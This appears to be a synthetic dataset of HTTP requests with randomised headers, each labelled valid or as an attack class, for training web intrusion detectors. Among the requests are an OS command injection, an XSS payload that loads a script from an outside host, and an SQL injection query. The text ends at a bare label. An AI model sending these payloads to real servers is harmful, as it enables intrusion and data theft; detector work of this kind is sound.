Upgrade: rss8so/4.4, hNo/7.8, dfee/8.1
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36736
Start - Id: 29347
class: Valid
GET /aU6Gtu5Fi@3830yX/AwR/gieltoiOZROf/rtrirwwaczvmq/thw/gdarm/iMt45uhGpnFhKn/xjtis7kneTevdhy/n8KoMA-3/Cuwhjt.nsf?cs7aEc=91718618&raoqonpehhm71=29&mAqnH8xXobgsound=yts HTTP/1.0
Host: www.eYexlc.org
Connection: 6thneocr
Accept: text/*, image/*, text/*;q=0.5
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=6
Client-ip: 58.32.164.183
Cookie: oxnih=3LeinLh
Cookie2: $Version="038"
Date: Mon, 15 Mar 10 17:32:38 CET
ETag: "I6lod4.WkBxa_3R"
Expect: 100-continue
From: huEdao@sesefui5t.biz
If-Modified-Since: Mon, 17 Sep 07 19:31:18 GMT
If-Unmodified-Since: Mon, 23 Oct 06 17:44:42 GMT
If-Match: *
If-None-Match: "@Pd1NZo@hCbuG@0TUPMs"
If-Range: "31Dk3ZMA0-.RAKc6"
Max-Forwards: 960
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="sreeyei"
Authorization: Digest algorithm=MD5
Range: 415-76250
Referer: /deogcara.pl
TE: gzip;q=0.5
Trailer: Host
User-Agent: Mozilla/5.0 (X11; U; Unix 6.9; Do-aZ; rv:9.2.3) Gecko/10839819
UA-CPU: PowerPC
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7326x099
Via: HTTP/3.3 www.rz7esf.js, 2.2 www.yOthoic.tiff:0220, 5.7 61.59.172.59
Transfer-Encoding: identity
Upgrade: eete/7.2
Warning: 540 www.negd.html:77 "yTtl7iqzf" "Mon, 21 Aug 06 08:54:19 UTC"
X-Forwarded-For: 41.177.120.181
X-Serial-Number: 725402
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29347
Start - Id: 15517
class: Valid
GET /remtyigsrrasotieHt/a_PfEH@.bin?bidbeht=94666&mqe=34292139&etqxnloertinoE=%2Fim+u%7Eo9%28htaccese&aesds0ra=eDvnporn1dtr&ihRrslt=emcsSh1&nftsiEnost=rm%7Ed91l&FkU9_@2yH-G=ehns&rxceiToa6ih=yxlyxterm%24ios6&oqp70mocha=md&HOwl9W%uUcPd=npsahshfgt7zi HTTP/1.0
Host: 189.26.253.91
Connection: keep-alive
Accept: application/*, video/*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.0, compress;q=0.7, identity
Accept-Language: rhE-tuhIaose;q=0.7, nratt-v;q=0.2
Cache-Control: max-stale=8
Client-ip: 108.114.210.77
Cookie: 2..Jhn=esam0dstdinfe0+slgaGss0ma;pa65=challl1oD$\Anode
Cookie2: $Version="618"
Date: Mon, 23 May 05 09:04:04 CET
ETag: W/"HfjNRiPZAw7WYjax@q"
Expect: iskib
From: seean@8ua2seurko.de
If-Modified-Since: Wed, 16 Aug 06 24:28:26 CET
If-Unmodified-Since: Fri, 05 Aug 05 04:33:35 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Jan 06 03:53:05 GMT
Max-Forwards: 9294
MIME-Version: 2.8
Pragma: lsyco='e3'
Proxy-Authorization: Digest username="mN2ceu"
Authorization: Digest opaque="e4go9n78"
Range: 253580-
Referer: /Hwgk/8oerhdm.jpeg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.5 (X11; U; Linux i386 0.2; cb-un; rv:5.2.3) Gecko/13247387
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 398x075
Via: 1.7 33.210.59.61
Transfer-Encoding: deflate
Upgrade: thhe/1.0, eaei/8.0, nsecs/0.9, aadn/9.2, 7na/8.4
Warning: 428 113.186.5.1:5 "dkuzsat" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 26014
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15517
Start - Id: 43347
class: OsCommanding
GET /Yrsnta/n4n@76mO/iisezmtnDohnstf/yse/tT3-/gNTcgOIlxKCi8ehGyUS/geew6iad/yhtotHaoif/JDts.ckmG/h67rIirsGrEh.tiff?ctmptelnetoFJb@.xAwhere=m4Kga-Gn&ahgbat1oe=sNtcnooae&0x3seenIldet=3223004&ebgr=a1Dx1IWVq6RY&rftrt=89427958&vptsMet=ls+++-las+++%2Fhome%2F++%7C&eotjmiHElgxDpv=210&mlai=47&Ut7m4z=ln8th&ihu=jvmfm&Obd25wnelort=a%3A7hf%3DeyImtiaeea3r&bepmitcesomiCiu=nRf8.x&uhenvlmtdaktmr=lbechobgsoundte HTTP/1.0
Host: 34.209.230.52
Connection: bbp7
Accept: */*
Accept-Charset: euc-kr;q=0.4, macintosh, windows-1252;q=0.4, utf-8;q=0.2, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 39.142.10.38
Cookie: oyTmq1=:n;Elinwmll7=iNfte0zaunnhildagd;iuLclooBtri=usriiAs9;ro0igo0y=abgaoiC
Cookie2: $Version="05"
Date: Thu, 01 May 08 18:57:27 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Sun, 01 Apr 07 01:49:14 CET
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: *
If-None-Match: "5Xm4-j6QM8jjuTm-lF"
If-Range: Tue, 28 Oct 08 04:25:18 CET
Max-Forwards: 74
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: Digest username="tnp3mru"
Range: -3
Referer: /agandh1/aopee/mr2lLaet.png
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 8.6; ta-te; rv:8.7.3) Gecko/12939649
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: 9.8 44.177.7.59, 7.9 www.0tso.jpg, 6.0 www.naoe5uRo.shtml
Transfer-Encoding: a1Wbe
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 403 www.BhEtseNt.htm:881 "eios3eNlEnn4itt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43347
Start - Id: 9434
class: Valid
GET /aVencPIxtg2/7aesHodAot/iK8ygEJccl1v/2G-cBLZV4JOSDu9/XkNvwUautoexeceqgkf/ncqreevienwjzlhu/1I4dYzKRGYoex/u9clTnisagjhunt/oitetyeai2n/9l9SoKjvar@hU6/nssttaoao7r0Dirmtt.sh?bv4HHs2SV0Rv=2unlasinMee4 HTTP/1.1
Host: www.zeL3RY7lg.gov
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.3, iso-8859-3, windows-1258;q=0.9, windows-1253
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 62.227.216.236
Cookie: filaldahvd=otpabiim gn;wTTK=02376001
Cookie2: $Version="17"
Date: Mon, 21 Apr 08 23:50:01 GMT
ETag: W/"t0GK3rq@Ccs.7X89-Zn"
Expect: a2deeos=4evRn;Otep
From: wibwt3iO@ihhho.be
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Fri, 12 Sep 08 19:59:00 UTC
If-Match: *
If-None-Match: "O.9b5d_IdTQRDscDFfi"
If-Range: Sat, 01 Oct 05 11:20:34 UTC
Max-Forwards: 33
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: Basic ZENsbW9uOjNrdHI=
Range: 13-1,-254711
Referer: http://jedba.gov/di0p3.tar
TE: gzip,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: vtaessso9nneL
UA-CPU: Sparc
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 383x664
Via: 3.6 www.egeb.htm:22, HTTP/2.7 129.110.224.22, FTP/3.9 164.92.168.144
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 738 140.221.7.254 "oocsausmslte1sij8e" "Sun, 16 Nov 08 18:45:16 CET"
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9434
Start - Id: 22141
class: Valid
GET /9lrns/e0hKFR2O7NtkomwN5Bvy/fauekkireetyi3ie/aTc62enleyfb/.HqUUYaFS@9htpasseWz.css?TIg_.7gi.2=9748 HTTP/1.0
Host: www.aetkRykis.com
Connection: s7utl1
Accept: text/*;q=0.3
Accept-Charset: euc-cn;q=0.4, gb2312;q=0.1, euc-kr;q=0.6, us-ascii;q=0.8
Accept-Encoding: *
Accept-Language: tSh-Hq, tm-n;q=0.0, nyoeoyi-UahmnUut;q=0.2
Cache-Control: min-fresh=4418
Client-ip: 27.176.30.28
Cookie: cDB-7zFOWhv=rwY3n1j2uUO;PDQSOgRKjF=apEHdsV6ZR
Cookie2: $Version="6"
Date: Tue, 01 Feb 05 09:15:27 CET
ETag: "o-nN.LM@G1lNSJx"
Expect: 0eOsst=prnHif81;eunueed
From: Tate@avzae.com
If-Modified-Since: Wed, 08 Apr 09 13:44:12 UTC
If-Unmodified-Since: Fri, 13 Aug 04 12:09:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 134
MIME-Version: 1.6
Pragma: i='Dtt'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZVNudGg1UHJlZHRvcjdlZXczb3lUc3NmQ3Vya2VpZTNBaXp3YWlNZThp
Range: 1976-
Referer: http://www.nemgv.uk/ifu6eo/aaetOat/pp68.php4
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 5.7; ug-oo; rv:1.0.4) Gecko/36008700
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 221x4182
Via: eotf/6.9 www.doAmi.jpg, FTP/0.5 233.28.109.206:2640
Transfer-Encoding: efwrnm; bt8towe=seige4a
Upgrade: owCw/2.4
Warning: 309 www.nrtE.htm:0 "s2qhlidru" 
X-Forwarded-For: 164.137.229.85
X-Serial-Number: 89307518698
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22141
Start - Id: 6104
class: Valid
PUT /inpciunBet/p_X9fBCpyTZWf6/4FKXJFAsZ2Bn176/tg5pDTOYKNQgZD2e4DPl/ssnwnupeaU/vFmodxZuF0y3uZF-c./d4-5v6pl3Ca-mV89ebeM.tiff? HTTP/1.0
Content-Length: 169
Content-Language: bta,24,lajetrp
Content-Encoding: identity
Content-Location: /p8akberU/isycos5x/jmlreuE.png
Content-MD5: NWU2YmVkNWlybjJ0YTBhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 May 07 24:04:20 UTC
Last-Modified: Wed, 22 Dec 04 17:40:09 GMT
Host: www.EcBps.it
Connection: ao4e2lpU
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=01011
Client-ip: 86.254.200.116
Cookie: I.likeG3SeXr=0;eoaeAi=tdflvzk.Mx;Tnaew4lsts=7 Adlrifoh
Cookie2: $Version="6"
Date: Mon, 19 May 08 02:17:15 CET
ETag: W/"NX9gb-ZQtwu8YX5h4"
Expect: mEhD=y8nam
From: g0cci8@oemaeN.uk
If-Modified-Since: Mon, 16 Aug 04 03:25:53 UTC
If-Unmodified-Since: Wed, 28 May 08 02:36:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Jul 09 18:32:37 CET
Max-Forwards: 6
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM aWVlbGh0aXJtZml0ZWJwbHJsYW9vZmV0c1ZPb3JuZHRjdHlhaWJvZUVnbkk1Zw==
Range: 32908-897936,302-48186
Referer: http://Ti5tc.net/b8afeeI6/9a32y/mpI4dn/lnb6t/cmar.asmx
TE: chunked;q=0.4,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/2.9 (X11; U; SunOS sun4u 3.5; E0-ip; rv:3.2.5) Gecko/32269735
UA-CPU: PowerPC
UA-Disp: 395,743,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4456x1785
Via: 0.4 144.5.30.45
Transfer-Encoding: deflate
Upgrade: mndT8/4.5
Warning: 650 69.47.85.230 "eneld6Odeonlenmnn" "Tue, 12 Aug 08 13:16:53 CET"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 89346832324261469384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

itn2t9eToualwe=0132&.kGPf=355&inheoitssgahe9=1kYX6yYxpZ&l1fMde=erTa&tohoyh6eanje=hRrZDh&qRincludeKrv5zg@-= &ndutOdx2srnern=eta=ypiframenm&qwedeleteb&y38=ujK&Uxe=ohva

End - Id: 6104
Start - Id: 15132
class: Valid
GET /itzFC/mcgFsgboCyed/nuTqwXuJpcexVh6-/iV6/a-TEh.dYfMnSO/dsawfkZxFC@Ckf/o8YWwW/i1TPknkX.6C097lw/je.js?naYee=ymetamcf&uuyid7eor=7%5D%27mloeltbh&rjrtaatfqtapeoi=415gpin2A&ohr=6882&qE1aiaa=bvts HTTP/1.0
Host: www.hkEd0.be:80
Connection: mWrhc0n
Accept: */*;q=0.9
Accept-Charset: koi8-r, cp-950, windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=82335
Client-ip: 238.189.15.82
Cookie: 7gia=http34ahlk0du lat
Cookie2: $Version="6"
Date: Fri, 16 Sep 05 22:56:13 UTC
ETag: "gpo4vmx3e_svOHVb"
Expect: 100-continue
From: tcnemzxc@oisi.it
If-Modified-Since: Tue, 23 Mar 04 11:12:01 CET
If-Unmodified-Since: Wed, 23 Dec 09 12:03:36 CET
If-Match: *
If-None-Match: "xi0C@WGAjnqvFFwLJjj"
If-Range: "iWJFNWFJve5w_cmB-Icw"
Max-Forwards: 0
MIME-Version: 6.6
Pragma: ienahta='ntclt1on'
Proxy-Authorization: NTLM cjN2d0l6NmxVOHJuaWgxOWhlZWFpdmV6YTJub3JON3Q=
Authorization: Basic cnZvdG86dGU4ZWx0RA==
Range: 8-,8116-1
Referer: http://sSt3de.st/onaeteec/e64sI2p/AMlrK/8eeeq1/m5a4gn.gif
TE: trailers,gzip,gzip;q=0.7
Trailer: User-Agent
User-Agent: wutz5ntrm (cDUWtIUs; tiK5qv; fzsWG1uL@; sKWycnkhl)
UA-CPU: 68000
UA-Disp: 7020,108,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 572x437
Via: FTP/3.1 211.163.140.137, 6.4 www.rSnl.htm
Transfer-Encoding: de5pZ; lh3Yhe8=epese
Upgrade: 0eh/6.4, osGe/9.1, lftl/8.8
Warning: 492 198.163.135.58 "Xr8olpskba5escfetmfl" "Tue, 05 Jul 05 16:42:14 UTC"
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 233434892494
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15132
Start - Id: 29946
class: Valid
GET /abLzeEspsndssta/cR/OSnullDimgX0.swf?eijtse0=tty&eSQreplaceVFPSkO=eYg&eisuz5=3NWcam&nnaoeEtrhrvla=mm.rAyFo5 HTTP/1.1
Host: 95.134.246.240:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.0, iso-8859-7;q=0.4, windows-1251
Accept-Encoding: *
Accept-Language: tllt-LfrSyEl, mop9r-neoooeo
Cache-Control: min-fresh=2
Client-ip: 172.16.242.17
Cookie: naon=a1lib])9ornehc[so;tsrhnupt=nullwnull r|dadminndm-aiMtp
Cookie2: $Version="061"
Date: Sun, 27 Jun 04 19:11:57 CET
ETag: "nppFvQZJOsbgkujKBs"
Expect: sp9u9b
From: mbacn5@elm6yst.uk
If-Modified-Since: Thu, 02 Jul 09 08:03:54 CET
If-Unmodified-Since: Wed, 23 Apr 08 01:29:41 UTC
If-Match: "zPH8n_DxJJmGIfg"
If-None-Match: "NovkCzIYP96HEGf16Lic"
If-Range: *
Max-Forwards: 701
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic emZvRUU6bWhkY2k=
Authorization: Digest opaque="diti"
Range: 054604-5
Referer: /ad6en0Pl/fn0nhe/folymit.png
TE: trailers
Trailer: Host
User-Agent: dU07sJ9 http://www.ne7sEarg.com
UA-CPU: MIPS
UA-Disp: 5197,782,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4455x5564
Via: HTTP/5.5 72.50.235.216, 3.8 www.wrbn.js
Transfer-Encoding: lhcc46; drlu=bloae8g
Upgrade: lrxtet/4.7, re6/2.9
Warning: 223 www.9aerce.css "ssaeelsoIRoEt2" "Thu, 01 Apr 04 19:48:08 GMT"
X-Forwarded-For: 43.204.198.183
X-Serial-Number: 7694011272
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29946
Start - Id: 19220
class: Valid
GET /ttehikdrfdiiar/o9/boLbGyxmlNN/he.ux/sn32e/i5Na/aG8dNOIibiIlpr_jW2@h/_AgE0ROI.jpg?_S_aBAN_ICGm=taeeinnlb&eb5Clnra=5176&qnsepeth=toexxryro&aetetrsy1Eaare=155&6cTZEsamLl82Q=s HTTP/1.1
Host: www.ma3a8.uk
Connection: keep-alive
Accept: application/*;q=0.0
Accept-Charset: iso-8859-8;q=0.6, windows-1252;q=0.5, x-mac-chinesesimp;q=0.9, iso-8859-5
Accept-Encoding: identity;q=0.8, deflate, deflate, deflate;q=0.5, deflate
Accept-Language: oetesep-keo, edlatb-s;q=0.2
Cache-Control: min-fresh=1659
Client-ip: 110.113.74.90
Cookie: jaAiaeauenn=hachVa;OsjyiehdowgT=5y;rbc=iHLXTH1H;efrtnnevmsagEi=1105423;iniwammRf=ossm;psottcnfal=p7eo
Cookie2: $Version="324"
Date: Fri, 09 Feb 07 15:14:44 UTC
ETag: W/"6qBP1Pb2RL9dUUt"
Expect: 100-continue
From: siiaioee@bal3q.biz
If-Modified-Since: Thu, 03 Jun 04 16:54:07 GMT
If-Unmodified-Since: Thu, 17 Apr 08 15:11:54 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Apr 06 21:09:30 UTC
Max-Forwards: 0
MIME-Version: 4.0
Pragma: ey=oo4
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: ntezn annicE3q=band
Range: 6738-658640
Referer: http://www.jR1b.com/R4oNmee/ilawxh/deak/ondhi.jsp
TE: deflate;q=0.7,trailers
Trailer: User-Agent
User-Agent: a1XmPm http://www.sttUhnec.com
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: 3.2 www.Zeee.css, 3.3 www.eaqIn.jpeg
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 676 www.eeehz.gif:5 "lhoHd9aieoatonpa" "Wed, 02 Nov 05 03:33:52 UTC"
X-Forwarded-For: 122.211.194.113
X-Serial-Number: 31033243317448893710
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19220
Start - Id: 47089
class: XSS
GET /eYVxzmie4b/uA4Sv0/te4rdbti/e0/rshdei/2q29aiXdyfC_zO.gif?twhneol1t=%3Cdiv++style++%3D+%22+++++binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.serone.com%2Fscript%2Fnfdx.pl%5D%29%3B++++%22++%3E HTTP/1.0
Host: www.pdt87cez.be
Connection: keep-alive
Accept: text/*, video/*, audio/x-wav;q=0.3
Accept-Charset: iso-8859-8, iso-8859-2, euc-kr;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 4.100.87.145
Cookie: obgxs= scriptt4|utia;aiiahp=ejalaj;rn=s&aO;hea=95927;lzmoigepwe=7cf6u;reaor9sllNoo=f
Cookie2: $Version="958"
Date: Tue, 12 Sep 06 21:19:04 CET
ETag: "0JgSjZMMlUkui8MumW9r"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 5
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM RG1mM3NqbEVxZ29jZW1hdHJsOG9lYWlzZ2ZnY3R3YmhlT2VhZWh4MmU=
Authorization: Basic YWVkZWYzOm5laGFldA==
Range: 8087-45811,698738-8731
Referer: http://www.moohit.uk/seLmir/rttt6reH/sshantH/eLdrat9.rar
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: 2te8N/9.8.1
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 320x898
Via: 5.9 www.u7d6l.tiff:570, 5.7 www.EsdTiio.html:59
Transfer-Encoding: gzip
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 172 www.rhaeeRv.gif "nh2drEOma5w7r" "Sat, 06 May 06 08:31:34 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47089
Start - Id: 20354
class: Valid
GET /tEgmnb/ejHeJ7MR8.rpvDTWxX/saPuaaat2aQtoedw.asp?w4hRoneeInjmshd=+e&@VWR85Wnode=humrrfdHw%5CTqnullb%3E&trc=0349&oiarfe2weeid=binRebetweenv&7ybi1ihuo6ot=etssjibin&Kst=28765984&tEivfen5Rreeegi=23&a8rz9hn8eltg=26305863&tpiona4yre=reoteci&osFm22hBfhs=usrpynpWr&eDoltorpdtCyikX=17528&noInrsN=r+tfpteuc&childiframedncOaLceVb=99U-awO7qpu&sa=7%3E+ HTTP/1.1
Host: www.u8ecsobe.cz
Connection: close
Accept: video/*;q=0.6, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 24.49.99.36
Cookie: sdsTekscr=m1b(;o3csllptcwRp=to7gPN3YN;s4zreo8thytaag=20;rbnbuEoe=saIa0eg2zsl;et5ditaArTdN=ospoeexec
Cookie2: $Version="36"
Date: Mon, 16 Jun 08 13:23:39 UTC
ETag: "EbDDSObU4FSkUAKQ5"
Expect: hxfo6sgy
From: ikwvhdpm@siorbj.uk
If-Modified-Since: Tue, 08 Jun 04 01:37:01 CET
If-Unmodified-Since: Thu, 24 Apr 08 24:27:20 CET
If-Match: "WrPTMIni1X0qSb."
If-None-Match: *
If-Range: Wed, 03 Dec 08 06:13:06 GMT
Max-Forwards: 722
MIME-Version: 0.0
Pragma: aheok5e=sik
Proxy-Authorization: NTLM Y2ltbGtkZmVlaW5qYXRhYWlkZW9haDVvaXNsdGR3bHFMYnQ3
Authorization: seao 2l6eqme=phJoupt
Range: -6349,-64
Referer: http://etjvaoeo.org/tRkEd.dll
TE: chunked;q=0.2,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 5.9; xa-Sa; rv:3.3.7) Gecko/00093494
UA-CPU: StrongARM
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 056x355
Via: 9.1 188.241.81.210, 6.4 www.antn1y.jpg
Transfer-Encoding: gzip
Upgrade: sqiew/4.1, 1n55Nn/3.3, aeif/5.3, csk/5.8
Warning: 417 www.fynjteI.jpg "ghs2Gimymbhauoku" "Tue, 02 Oct 07 18:48:29 CET"
X-Forwarded-For: 11.244.14.65
X-Serial-Number: 11331311370992169456
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20354
Start - Id: 42250
class: SqlInjection
GET /ianiNmgoRz1Gi2oesi/kalh/6ooyroemqchsowcdf/aobs0s4l/JnR0unionkipPtR/tyIIT.T5YucussfO_/iFGHmTPqU1@SjGGA_jq/BG/ediaOnh5a4ecsaei.jpg?qufeopEo=10&eiDoi7gcLefuj=%27select++++customer_phone++++%27%7C%7C%27from+++customers+++++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++and+++customer_type%3D1%27%3B&joesunw5=S%24&b1rmrctro5mdo=9 HTTP/1.1
Host: 197.21.151.62
Connection: hsiN
Accept: application/*;q=0.1, application/rtf
Accept-Charset: isiri-3342, windows-1252
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=34
Client-ip: 164.216.181.230
Cookie: eaergxsqesoL=31
Cookie2: $Version="201"
Date: Mon, 24 Jul 06 15:49:54 UTC
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: ppnuhf@cKraaqblss.ch
If-Modified-Since: Sat, 17 May 08 16:55:56 GMT
If-Unmodified-Since: Tue, 14 Jul 09 08:21:23 CET
If-Match: "wKmmavs0rUJ4CYVa"
If-None-Match: *
If-Range: Wed, 11 May 05 22:29:57 UTC
Max-Forwards: 801
MIME-Version: 7.5
Pragma: atdd=eeb
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZWxoZWF1aWl0MW5ldE0wZHcxd3FzeWxhc25udmZ3dXlzcGllcjVyd3NsdWhueXN4
Range: 4539-14148,-19,934-
Referer: /eo7Enr/otNhy.js
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/7.4 (compatible; iuhiie3k; Solaris; awtorlEx; btrcqt6o1; aimEr)
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: HTTP/1.9 25.245.83.106
Transfer-Encoding: gzip
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42250
Start - Id: 25248
class: Valid
GET /es2oavl/e3aiqea.php3?SrerbGs=seiaiyimgautoexecmgi&2i9mrClE=imN8&cnrvvdd=ulo+adm&rn3ndAeAwrhAc=0387950&tvgnSs=439&_YmochaJS3.8d0-=6&getxe0fhradhmil=7AEO.Flta3&Haro4oof9fht=iCPg6&neteserssfoieir=9&2soy=a+T9tQl&EX7MP2CiframeQ-Kn=allrye%40oawindow.openhu&cuE36AChtpass10ftp7=etdgc%2Banx&anudmhC2rrxlote=0 HTTP/1.1
Host: www.otontb.uk
Connection: close
Accept: video/mpeg;q=0.2, application/*;q=0.8
Accept-Charset: windows-1257;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 201.37.154.99
Cookie: CevalVXRDdrop=955156152;hQHmmail=03759;ne3Nrqehe=25279;yaendliCp=654882;enhttRut=8xTZU;siloehgeimehe1=iRmsrskcer9O
Cookie2: $Version="9"
Date: Mon, 13 Aug 07 11:23:22 UTC
ETag: "B_4u6uvIEYTsvJn7"
Expect: 100-continue
From: k4NgNry@tf92Cos.be
If-Modified-Since: Wed, 09 Jul 08 14:22:31 GMT
If-Unmodified-Since: Sat, 04 Jul 09 12:40:52 UTC
If-Match: "c@utkd0uQdRx._BVG"
If-None-Match: "Q-HKpZc0jnvW8ry8CL"
If-Range: Thu, 16 Feb 06 05:21:46 GMT
Max-Forwards: 291
MIME-Version: 3.2
Pragma: o1=anhrd
Proxy-Authorization: 7ddr oinerrtu=Stpan
Authorization: Basic QUd4dGV5YTp5aGhu
Range: 95085-,-05
Referer: /37jHrouc.rar
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/7.6 (Windows; U; WinNT 8.5; u5-yz; rv:8.0.4) Gecko/25835090
UA-CPU: PowerPC
UA-Disp: 8204,1865,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 765x9448
Via: 0.5 34.102.139.249
Transfer-Encoding: compress
Upgrade: 1oew6/6.7, 13a/4.7, aismae/7.4
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 97.101.10.212
X-Serial-Number: 355160379643379
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25248
Start - Id: 45537
class: PathTransversal
